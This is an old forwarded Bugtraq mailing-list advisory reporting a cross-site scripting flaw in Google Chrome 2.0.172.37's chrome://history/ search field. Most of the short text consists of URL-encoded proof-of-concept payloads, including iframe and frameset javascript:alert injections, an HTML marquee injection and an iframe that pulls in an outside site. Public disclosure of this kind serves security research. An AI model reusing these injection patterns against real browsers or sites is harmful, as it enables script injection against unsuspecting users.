Fwd: cross site scripting the browser google "chrome"

v2.0.172.37

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CIFRAME%20SRC%3D%22javascript%3Aale=
rt(XSS)%3B%22%3E%3C%2FIFRAME%3E

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CFRAMESET%3E%3CFRAME%20SRC%3D%22jav=
ascript%3Aalert(XSS)%3B%22%3E%3C%2FFRAMESET%3E

Best Regards,
Karn Ganeshen


---------- Forwarded message ----------
From: biko linux <bikolinux@gmail.com>
Date: Tue, Jul 28, 2009 at 1:03 AM
Subject: cross site scripting the browser google "chrome"
To: bugtraq@securityfocus.com


autor : =A0 =A0 =A0 =A0 bikolinux
Vuln: =A0 =A0 =A0 =A0 =A0 cross site scripting the browser google "chrome"
Download: =A0 =A0 =A0 http://www.google.com/chrome
error =A0 =A0 =A0 =A0 =A0 local
EMAIL =A0 =A0 =A0 =A0 =A0 MSG@BIKOLINUX.NET bikolinux@gmail.com
vercion test =A02.0.172.37
###########################################################################=
############
cross site scripting the browser google "chrome"
The error is when making a request to record
###########################################################################=
############
path =3D chrome://history/
path =3D view-source:chrome://history/

The error is in the form

EXAMPLE
chrome://history/#q=3D%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2F=
marquee%3E
view-source:chrome://history/#q=3D"><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=3D%22%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.=
Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E



--
bikolinux allowed